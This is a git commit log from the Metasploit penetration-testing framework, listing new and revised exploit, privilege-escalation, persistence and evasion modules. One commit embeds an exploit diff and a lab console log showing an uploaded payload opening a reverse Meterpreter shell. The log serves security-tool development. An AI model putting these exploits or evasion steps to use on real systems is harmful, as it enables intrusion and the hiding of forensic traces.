Fix typo. 2018-10-25 17:55:01 +08:00
Green-m 760b14e71d
Update the version match code. 2018-10-25 15:33:54 +08:00
Wei Chen 2ab9a003d4
Land #10864, Add Cisco WebEx RCE Modules 2018-10-24 16:20:00 -05:00
Wei Chen f52cbdf9d7 Change option types 2018-10-24 16:18:17 -05:00
Wei Chen 4ec7e41f9e Change option type 2018-10-24 16:16:03 -05:00
Wei Chen e84ba62740 Cosmetic changes for local/webexec 2018-10-24 16:13:47 -05:00
Elazar Broad 16d633fabd
Remove spaces before EOL 2018-10-24 11:04:41 -04:00
Shelby Pace 3729e9ed7b
added description, references 2018-10-24 09:46:00 -05:00
Fabien 9f0c8a0929
Create bypassuac_computerDefault.rb 2018-10-24 15:06:07 +02:00
kr3bz 2e2d742ae7
Added updated mercury_login
Added additional space for the payload, made recommended changes, msftidy does not produce errors, readded null byte as a badchar.
2018-10-24 11:08:37 +02:00
William Vu 458f635159 Add supported payloads to module description 2018-10-24 01:30:27 -05:00
William Vu 839c4e0467 Drop rank to AverageRanking for now 2018-10-24 01:30:17 -05:00
William Vu 37560760df Add RequiredCmd for generic and telnet 2018-10-24 01:23:15 -05:00
Elazar Broad ef2854c918
Use in-memory reflection for executing the payload
Use to_win32pe_psh_reflection() instead of to_win32pe_psh_net() in order to reduce the amount of processes and forensic artifacts created by this module.
2018-10-23 22:12:10 -04:00
Elazar Broad d75c599929
Use ShellExecuteA to spawn eventvwr.exe
Use ShellExecuteA from railgun to spawn eventvwr.exe, as opposed to cmd /c. This reduces the amount of processes generated by this module.
2018-10-23 21:52:36 -04:00
Elazar Broad da4b424780
Fix typo in cleanup message 2018-10-23 21:33:49 -04:00
bwatters-r7 569c2e03c9
Fix exploit relics and documentation 2018-10-23 17:15:34 -05:00
William Vu 67f2933b58 Make fewer assumptions about Apache
Returning CheckCode::Safe is too aggressive for a supplemental check.
Admins can change the directive in top-level configuration, anyway.
2018-10-23 16:26:17 -05:00
egre55 d1111ace5d fixes 2018-10-23 17:19:14 -04:00
Shelby Pace 34ae9c38f9
added WebEx modules, arch check 2018-10-23 15:51:23 -05:00
bwatters-r7 927a29530b
Remove duplicated files 2018-10-23 12:31:18 -05:00
Brent Cook 65c0573738
Land #10848, improve play_youtube post module 2018-10-23 12:26:55 -05:00
Brent Cook e992b63520
Land #10856, add SSL support to php meterpreter 2018-10-23 11:59:09 -05:00
kr3bz be2ec76ed2
Added modified mercury_login.rb
Modified the script with recommendations.
2018-10-23 17:17:30 +02:00
William Vu 9c49acb924 Fail scanner instead of returning 2018-10-23 10:07:38 -05:00
William Vu 58a1b65e60 Update Exploit::CheckCode::Unknown
Brain fart.
2018-10-23 09:34:48 -05:00
William Vu 899238a4e3 Update libssh_auth_bypass with command output 2018-10-23 09:34:42 -05:00
Spencer McIntyre c71bbc1019 Remove spaces that msftidy caught 2018-10-23 10:13:44 -04:00
Brendan Coles 0e7259040d
Update modules/exploits/windows/imap/mercury_login.rb
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
2018-10-23 14:32:53 +02:00
Brendan Coles 903f5e9ede
Update modules/exploits/windows/imap/mercury_login.rb
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
2018-10-23 14:32:44 +02:00
Brendan Coles 0b37e29c9a
Update modules/exploits/windows/imap/mercury_login.rb
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
2018-10-23 14:32:38 +02:00
Brendan Coles 43dd23042b
Update modules/exploits/windows/imap/mercury_login.rb
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
2018-10-23 14:32:10 +02:00
William Vu bdf2d44415 Augment check with Apache Server header 2018-10-23 07:04:14 -05:00
William Vu 0249f1a4af Improve check method and refactor 2018-10-23 06:20:31 -05:00
Ivan Racic ee3c663baf Upgraded exploit to work on any Windows target
In short, added egghunter and return address of
the executable file itself, so it should work
on any windows system.

Also, upgraded to modern exploit module requirements.
2018-10-23 12:11:56 +02:00
William Vu 3d06c10ad0 Link to Apache AllowOverride directive and change 2018-10-23 03:51:16 -05:00
William Vu c9673df3b8 Add WordPress Work The Flow File Upload links
As noted by @bcoles, we have a module exploiting this vuln in #5130,
though it was described as the WordPress plugin and not the asset it had
included. The vuln was "patched" in the plugin by deleting the code.
Somehow this flew under everyone's noses.

msf5 exploit(unix/webapp/wp_worktheflow_upload) > edit
msf5 exploit(unix/webapp/wp_worktheflow_upload) > git diff
[*] exec: git diff

diff --git a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
index 727c1936f5..2146be49ec 100644
--- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
+++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
@@ -50,8 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
     post_data = data.to_s

     res = send_request_cgi({
-      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php'),
+      'uri'       => '/jQuery-File-Upload/server/php/index.php',
       'method'    => 'POST',
       'ctype'     => "multipart/form-data; boundary=#{data.bound}",
       'data'      => post_data
@@ -70,8 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote

     print_status("Calling payload...")
     send_request_cgi(
-      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename)
+      'uri'       => "/jQuery-File-Upload/server/php/files/#{php_pagename}"
     )
   end
 end
msf5 exploit(unix/webapp/wp_worktheflow_upload) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 172.28.128.1:4444
[+] Our payload is at: rLRFvlAiE.php. Calling payload...
[*] Calling payload...
[*] Sending stage (37775 bytes) to 172.28.128.3
[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.3:54386) at 2018-10-23 03:17:59 -0500
[+] Deleted rLRFvlAiE.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu-xenial
OS          : Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >

Welp.
2018-10-23 03:51:11 -05:00
William Vu a55f7ff30a Clarify vuln (re)discovery vs. disclosure
https://www.bleepingcomputer.com/news/security/jquery-file-upload-plugin-vulnerable-for-8-years-and-only-hackers-knew/
2018-10-23 03:22:45 -05:00
William Vu b4bdc52597 Sort path list by frequency 2018-10-22 23:35:42 -05:00
William Vu dbc0c802d5 Add detection of additional paths 2018-10-22 23:35:42 -05:00
William Vu c4f8b6c937 Add rudimentary check method 2018-10-22 23:35:42 -05:00
William Vu dba7e35819 Refactor slightly with methods
And also check upload response.
2018-10-22 23:35:42 -05:00
William Vu e7ada1a40c Add timeout on payload request
This ensures we don't block on execution.
2018-10-22 23:35:42 -05:00
William Vu 15f14bb295 Add note about Apache .htaccess 2018-10-22 23:35:42 -05:00
William Vu a986a17bb0 Link to @lcashdol's PoC 2018-10-22 23:35:42 -05:00
William Vu 37dbdbf58f Update project URL to PR 2018-10-22 23:35:42 -05:00
William Vu 41721c31fb Add blueimp's jQuery (Arbitrary) File Upload 2018-10-22 23:35:42 -05:00
Green-m c0e8d09802
Add disclosure date. 2018-10-23 09:44:36 +08:00
Spencer McIntyre 15e67de8fc Add the EMBED option for play_youtube.rb 2018-10-22 19:51:41 -04:00
William Vu 3ca309423a Add check method to detect 4.3BSD fingerd 2018-10-22 18:32:37 -05:00
William Vu 8459aad215 Prefer aobleq over incl/cmpl/bleq in payload 2018-10-22 18:32:37 -05:00
William Vu 01d11e71db Add Space, BadChars, Encoder, and DisableNops 2018-10-22 18:32:37 -05:00
William Vu fa892d8eba Add Morris worm fingerd stack buffer overflow 2018-10-22 18:32:37 -05:00
William Vu 8f2df4864c Add 4.3BSD VAX reverse command shell payload 2018-10-22 18:32:37 -05:00
Jeffrey Martin 380aaf7889
bump payloads gem 2018-10-22 18:20:45 -05:00
William Vu e6bbc6dbd6
Land #10845, glassfish_traversal typo fix 2018-10-22 15:32:14 -05:00
pasta 8d9bd33222 new version using Metasm 2018-10-22 16:36:04 -03:00
blue-bird1 6125ef06ad fix small typo 2018-10-23 00:01:13 +08:00
Green-m 4711d6ba08
Move post module persistenct service to exploit. 2018-10-22 18:07:40 +08:00
Luisco100 74683ce951 Add Windows Post Module to disable Windows Defender signatures 2018-10-21 12:07:54 -05:00
William Vu 58a6c4137d Add a better timeout than expect can provide 2018-10-20 13:56:37 -05:00
William Vu a965abaf36 Add full payload support by setting $PATH 2018-10-20 13:56:33 -05:00
William Vu 60c4b87ad1 Prefer expect over sleeping between writes 2018-10-20 13:15:15 -05:00
William Vu ad6f15c8ca Add Morris worm sendmail debug mode exploit 2018-10-20 13:15:01 -05:00
Brendan Coles 7a36056713 Move exploit/qnx/qconn_exec to exploit/qnx/qconn/qconn_exec 2018-10-20 18:16:59 +00:00
William Vu aae74472d2
Land #10817, QNX qconn module rename 2018-10-20 03:10:22 -05:00
Brent Cook accf9edf89
Land #10835, libssh fingerprint improvements 2018-10-19 19:48:23 -05:00
bwatters-r7 47353553e5 Get everything together finally (still needs cleanup) 2018-10-19 18:15:44 -05:00
bwatters-r7 a6be9e573f
Should have saved the actual file... 2018-10-19 16:30:21 -05:00
bwatters-r7 eeec3c115e
This is as far as I can take it for an exploit module
but it still does not work.  Commiting for posterity.
2018-10-19 16:12:47 -05:00
William Vu abd425c863
Land #10819, os_name population for ssh_login* 2018-10-19 15:53:38 -05:00
William Vu db7bd3d50c Update style 2018-10-19 15:52:26 -05:00
William Vu 2a1dec45ed
Land #10832, TARGETURI for tomcat_utf8_traversal 2018-10-19 15:47:37 -05:00
William Vu e4c71265fb Improve banner checking in libssh_auth_bypass
Now we do the right thing when libssh is patched.
2018-10-19 15:21:12 -05:00
pasta 3a02e9e80f First release, messagebox payload for x64 2018-10-19 16:39:41 -03:00
Spencer McIntyre 65d26d3a1e Use the DISPLAY environment variable when available 2018-10-19 14:35:35 -04:00
William Vu 21397330f8 Refactor fortinet_backdoor copypasta 2018-10-19 00:07:18 -05:00
William Vu 863ab3447f Add libssh auth bypass module 2018-10-18 23:03:23 -05:00
Wei Chen 3cee96d8ed
Land #10664, add Windows SetImeInfoEx Win32k NULL Pointer Dereference 2018-10-18 14:42:14 -05:00
Wei Chen fac05db154 Update rescue statement 2018-10-18 14:30:20 -05:00
Brendan Coles 02c916b1b4 Update modules/auxiliary/admin/http/tomcat_utf8_traversal.rb 2018-10-19 04:16:26 +11:00
Patrick Webster 175e5e5adf Added module TARGETURI support. 2018-10-19 03:55:45 +11:00
Tim W b3d45586db feedback from code review 2018-10-18 12:30:46 +08:00
Green-m 73d3cb8c03
Fix some format errors. 2018-10-18 12:01:57 +08:00
Tim W 64e257649f cleanup module 2018-10-18 11:45:59 +08:00
Tim W 290d4428c1 create git mixin 2018-10-18 11:31:31 +08:00
Tim W 063e477ff2 git submodule url exec (CVE-2018-17456) 2018-10-18 11:02:28 +08:00
bwatters-r7 d2c013001d
Update stuff 2018-10-17 17:17:05 -05:00
Green-m f59792773f
Add post module windows persistent service. 2018-10-17 18:44:46 +08:00
h00die 763506f28d ssh_login now populates the os_name field 2018-10-16 22:02:44 -04:00
h00die 4a06fe1d4b use store_valid_credential instead 2018-10-16 14:01:49 -04:00
Brendan Coles a14df8d86e Move exploit/unix/misc/qnx_qconn_exec to exploit/qnx/qconn_exec 2018-10-16 16:21:28 +00:00
Tim W 2e91ec1495 semicolons :) 2018-10-16 14:59:27 +08:00
Tim W 96ba3c636b fix indentation and add author 2018-10-16 14:56:25 +08:00
Tim W 57e2dd2192 send payload url to loader 2018-10-16 14:41:34 +08:00
Shelby Pace 9e069c95f5
add auto targeting 2018-10-15 23:26:08 -07:00
Shelby Pace 6cdfe604d4
removed exception handling for reg_file_for_handle 2018-10-15 18:29:15 -07:00
Wei Chen a19046dedb
Land #10793, improve windows_defender_js_hta 2018-10-15 17:42:21 -05:00
Wei Chen 8e442cc980 Update documenation 2018-10-15 15:45:39 -05:00
Wei Chen b0313dd25c Update getgodm_http_response_bof for proper auto targets 2018-10-15 15:25:55 -05:00
Wei Chen ff9f3ed9ff Add support for v5 2018-10-15 15:14:12 -05:00
Wei Chen 5433d2cca9 Sync up upstream master 2018-10-15 14:19:07 -05:00
Dhiraj Mishra f78ccbf995
Indentation 2018-10-15 08:32:58 +05:30
h00die 8877582086
Land #10668 rsh stack clash solaris priv esc 2018-10-14 10:34:48 -04:00
h00die f399b59ae4 Merge branch 'master' of https://github.com/rapid7/metasploit-framework into cisco_device_manager 2018-10-13 13:31:20 -04:00
Shelby Pace a942654515
rescue-from-method addressed 2018-10-12 14:47:05 -05:00
Shelby Pace 26631bcfbd
addressed suggestions 2018-10-12 14:35:42 -05:00
William Vu 5b14d94957
Land #10671, struts2_namespace_ognl updates
There are still some outstanding concerns, but I want to unblock this.
2018-10-12 11:08:33 -05:00
William Vu 2989507b85 Copy check for data_header to avoid crash
Variable was used but out of scope.
2018-10-12 11:06:26 -05:00
Dhiraj Mishra 96eeaf7da3
Made few changes
Thank you bcoles
2018-10-12 11:47:53 +05:30
h00die f675ba5243 password not username 2018-10-11 17:08:03 -04:00
h00die 20a376130e cat variable name 2018-10-11 17:04:57 -04:00
h00die 7cc46df6db add docs and update cisco_device_manager 2018-10-11 17:01:38 -04:00
Shelby Pace a67122aaf7
updated doc, added x86_64 binary 2018-10-11 12:37:51 -05:00
Shelby Pace 521b50af55
added separate binaries, extended for x86 2018-10-11 10:43:35 -05:00
amaloteaux f8ad47d475 improve windows_defender_js_hta :
-add platform detection for jsc
-prevent cmd prompt when launching jsc
2018-10-11 17:38:47 +02:00
Alex Gonzalez 1da99c8bd1
Fixed syntax errors
Corrected redundant returns and indentation errors
2018-10-11 10:01:47 -04:00
Alex Gonzalez 86f7c270c6
Fixed stylistic and syntax errors 2018-10-11 09:19:35 -04:00
l9c ed2ba1cb00 add support for ProcessName option, defaults to spoolsv.exe 2018-10-11 17:23:59 +08:00
l9c ce848712dd add support for ProcessName option, defaults to spoolsv.exe 2018-10-11 10:56:07 +08:00
Patrick DeSantis c0aff8f134
Description update / typo fix
fix typo in module description (added one word)
2018-10-10 17:56:17 -04:00
Shelby Pace 04cc40136f
changed formatting, deleted post, renamed files 2018-10-10 14:41:14 -05:00
Shelby Pace 76325bd21e
fixed indentation 2018-10-10 14:18:44 -05:00
Jacob Robles fb689da24c
Land #10335, Add vlc_mkv exploit module 2018-10-10 13:47:08 -05:00
Alex Gonzalez 0f3917f540
Fixed syntax errors 2018-10-10 13:26:49 -04:00
Jacob Robles 50a7ee5e6a
Minor modifications 2018-10-10 12:22:47 -05:00
Dhiraj Mishra ee2c6274c7
Updating description 2018-10-10 22:26:07 +05:30
Dhiraj Mishra 4a821101ce
Fixing cmd_exec_get_pid 2018-10-10 21:59:46 +05:30
Jacob Robles 796579e265
Use fail_with 2018-10-10 11:24:16 -05:00
Jacob Robles 4beb434054
Default Payloads
exploit:vlc_mkv default target payloads
2018-10-10 11:23:17 -05:00
Dhiraj Mishra c1c07d5c8f
Updating
Suggestion given by Shelby
2018-10-10 21:30:12 +05:30
Tim W fe356dabca convert payload to dylib 2018-10-10 23:35:20 +08:00
Brendan Coles 8826932f72 Fix syntax errors 2018-10-10 14:39:07 +00:00
Brendan Coles 15cfeb37ea CamelCase 2018-10-10 14:35:34 +00:00
Brendan Coles 7a048afd14 Make WritableDir an advanced option 2018-10-10 14:12:29 +00:00
Tim W 4653cbdda1 add macho mixin 2018-10-10 20:27:56 +08:00
Tim W 7fce2bd428 initial commit of 32bit trident exploit 2018-10-10 17:41:28 +08:00
Dhiraj Mishra dbcee56995
Fixing spaces at EOL 2018-10-10 15:10:58 +05:30